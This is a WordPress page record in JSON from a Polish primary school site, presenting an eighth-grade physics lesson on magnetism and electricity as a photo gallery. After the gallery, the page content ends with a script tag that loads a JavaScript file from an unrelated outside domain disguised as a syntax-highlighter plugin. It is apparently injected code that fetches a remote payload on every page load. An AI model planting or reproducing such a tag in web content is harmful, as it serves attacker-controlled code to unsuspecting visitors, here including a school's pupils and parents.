{"id":13883,"date":"2019-12-04T06:11:29","date_gmt":"2019-12-04T05:11:29","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=13883"},"modified":"2020-04-01T03:51:05","modified_gmt":"2020-04-01T01:51:05","slug":"magnetyzm-i-elektrycznosc","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/ciekawe-zajecia\/magnetyzm-i-elektrycznosc\/","title":{"rendered":"Magnetyzm i elektryczno\u015b\u0107"},"content":{"rendered":"<p>Lekcja fizyki w klasie \u00f3smej &#8211; Magnetyzm i elektryczno\u015b\u0107.<\/p>\n<p><div id='gallery-1' class='gallery galleryid-13883 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78244008_466729487579056_2417087919220064256_n.jpg\" title=\"78244008_466729487579056_2417087919220064256_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78244008_466729487579056_2417087919220064256_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78403927_543565253149405_8981582532189356032_n.jpg\" title=\"78403927_543565253149405_8981582532189356032_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78403927_543565253149405_8981582532189356032_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/76944855_555299071712288_835755130623098880_n.jpg\" title=\"76944855_555299071712288_835755130623098880_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/76944855_555299071712288_835755130623098880_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78954373_574117280082431_4241496967504461824_n.jpg\" title=\"78954373_574117280082431_4241496967504461824_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78954373_574117280082431_4241496967504461824_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/76914422_654539461617651_3743814531114074112_n.jpg\" title=\"76914422_654539461617651_3743814531114074112_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/76914422_654539461617651_3743814531114074112_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/76771521_802502893519744_3469926412268339200_n.jpg\" title=\"76771521_802502893519744_3469926412268339200_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/76771521_802502893519744_3469926412268339200_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/79179693_1022854141400714_6440032941836861440_n.jpg\" title=\"79179693_1022854141400714_6440032941836861440_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/79179693_1022854141400714_6440032941836861440_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/74397284_2725848464144730_54958255490727936_n.jpg\" title=\"74397284_2725848464144730_54958255490727936_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/74397284_2725848464144730_54958255490727936_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78646699_2799624683422369_3247744769043988480_n.jpg\" title=\"78646699_2799624683422369_3247744769043988480_n\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/12\/78646699_2799624683422369_3247744769043988480_n-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lekcja fizyki w klasie \u00f3smej &#8211; Magnetyzm i elektryczno\u015b\u0107.<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":12376,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/13883"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=13883"}],"version-history":[{"count":4,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/13883\/revisions"}],"predecessor-version":[{"id":14943,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/13883\/revisions\/14943"}],"up":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12376"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=13883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}